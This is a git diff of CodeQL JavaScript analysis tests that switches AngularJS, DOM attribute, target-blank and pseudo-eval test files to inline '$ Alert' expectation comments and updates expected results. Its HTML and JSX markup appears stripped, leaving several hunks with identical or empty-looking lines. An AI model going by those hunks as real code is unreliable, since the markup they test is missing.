repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref index 0cb3bca6dd4c..fdd21bbbde39 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref @@ -1 +1,2 @@ -AngularJS/RepeatedInjection.ql \ No newline at end of file +query: AngularJS/RepeatedInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js @@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected @@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref index e47f1e1bb452..4ae72160a8d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref @@ -1 +1,2 @@ -AngularJS/UnusedAngularDependency.ql \ No newline at end of file +query: AngularJS/UnusedAngularDependency.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js @@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected @@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref index f746d68ee039..0d148711d808 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref @@ -1 +1,2 @@ -AngularJS/UseNgSrc.ql +query: AngularJS/UseNgSrc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..943b7d1ccd7d 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html @@ -4,13 +4,12 @@ - - Help + Help - - + + - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
    - - Help + Help
    diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref index b9796d5fe875..514a8413531d 100644 --- a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref +++ b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1 @@ -Comments/CommentedOutCode.ql +query: Comments/CommentedOutCode.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref index 1a8a4a57b6d4..3fad05c4f256 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref +++ b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref @@ -1 +1 @@ -Comments/TodoComments.ql +query: Comments/TodoComments.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref index a7f743a3788e..cd82a95525cc 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref +++ b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref @@ -1 +1,2 @@ -DOM/Alert.ql +query: DOM/Alert.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..bee7199e45f8 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:16:22:16:33 | id="theDiff" | This element has the same id as $@. | tst.js:16:46:16:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html index 98a490ec408a..3cd7b57ed393 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html @@ -1,7 +1,7 @@
      -
    • First element +
    • First element
    • Second element
    diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref index 7dfdfdde152a..a0e49e6dd91c 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref @@ -1 +1,2 @@ -DOM/AmbiguousIdAttribute.ql +query: DOM/AmbiguousIdAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html index bb5969c1f79e..9b0f0a8eb7ee 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html @@ -5,8 +5,8 @@
  • Second element
  • Templated id
  • Templated id
    • -
  • Invalid id
    • -
  • Invalid id
    • +
  • Invalid id
    • +
  • Invalid id
  • duplicate-class
  • duplicate-class
    • diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html index 2d5e014268c0..d96d9a670756 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html @@ -1,4 +1,4 @@
      -
    • First element +
    • First element
    • Second element
    diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected @@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html index 92af95c3e3c1..9c1d31c1427d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html @@ -1 +1 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref index 7022b813c939..678090c3e81b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref @@ -1 +1,2 @@ -DOM/ConflictingAttributes.ql +query: DOM/ConflictingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..02866a675677 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected @@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:18:17:18:28 | id="theDiff" | This attribute $@. | tst.js:18:30:18:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html index 4155ef623419..95a34ce55fd1 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html @@ -1,3 +1,3 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref index 1ce0181329f1..9066faa039ff 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref @@ -1 +1,2 @@ -DOM/DuplicateAttributes.ql +query: DOM/DuplicateAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html index 9da8fcde5022..45d14ac5bb70 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html @@ -1 +1 @@ -
    An important heading
    +
    An important heading
    diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref index 8665e0ad7b85..04f910af31b9 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref @@ -1 +1,2 @@ -DOM/MalformedIdAttribute.ql +query: DOM/MalformedIdAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..04f9ee0bd554 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,18 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
    ; var div2 =
    ; -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// not OK -Semmle; +Semmle; // $ Alert[js/duplicate-html-attribute] -// not OK -
    ; -
    ; +
    ; // $ Alert[js/malformed-html-id] +
    ; // $ Alert[js/malformed-html-id] -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// OK
    ; -// not OK -var div3 =
    ; +var div3 =
    ; // $ Alert[js/duplicate-html-id] -// not OK -var div4 =
    ; +var div4 =
    ; // $ Alert[js/duplicate-html-attribute] diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref index 4d773c9c35d7..51a532f97916 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref @@ -1 +1,2 @@ -DOM/PseudoEval.ql \ No newline at end of file +query: DOM/PseudoEval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js index 52030b2e2584..18f3828a15e2 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js @@ -1,10 +1,10 @@ -window.setTimeout(";"); -setInterval("update();"); +window.setTimeout(";"); // $ Alert +setInterval("update();"); // $ Alert setInterval(update); -document.write("alert('Hi!');"); -window.execScript("debugger;"); +document.write("alert('Hi!');"); // $ Alert +window.execScript("debugger;"); // $ Alert (function(global) { var document = global.document; - document.write("undefined = 2"); + document.write("undefined = 2"); // $ Alert })(this); diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..d9842e5c53c0 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected @@ -1,9 +1,9 @@ | tst.html:23:1:23:61 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | +| tst.html:25:1:25:54 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:16:1:16:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:29:12:29:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:36:12:36:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref index d02f1866b82d..3f4f724c916c 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref @@ -1 +1,2 @@ -DOM/TargetBlank.ql +query: DOM/TargetBlank.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html index 78c104bcaa1e..53d0df2000d9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html @@ -20,14 +20,14 @@

    OK, because of constant prefix

    Example

    NOT OK, because of dynamic URL

    -Example -Example - +Example +Example + Example

    NOT OK: mailto is not fine.

    -mail somone +mail somone

    OK: template elements after # or ? are fine.

    Example diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..7f3f7c9fc537 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,6 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK Example; Example; Example; @@ -9,42 +8,37 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; -Example; -Example; +Example; // $ Alert - because of dynamic URL +Example; // $ Alert +Example; // $ Alert function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +46,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref index e48959a692ac..b955dfe9e83b 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref @@ -1 +1,2 @@ -Declarations/ArgumentsRedefined.ql +query: Declarations/ArgumentsRedefined.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..1aceac8eeb0d 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,13 +1,13 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ - for ([arguments] of o); - for ([arguments = 4] of o); + for ([arguments] of o); // $ Alert + for ([arguments = 4] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected index b74841153cb3..7e457d64b08e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected +++ 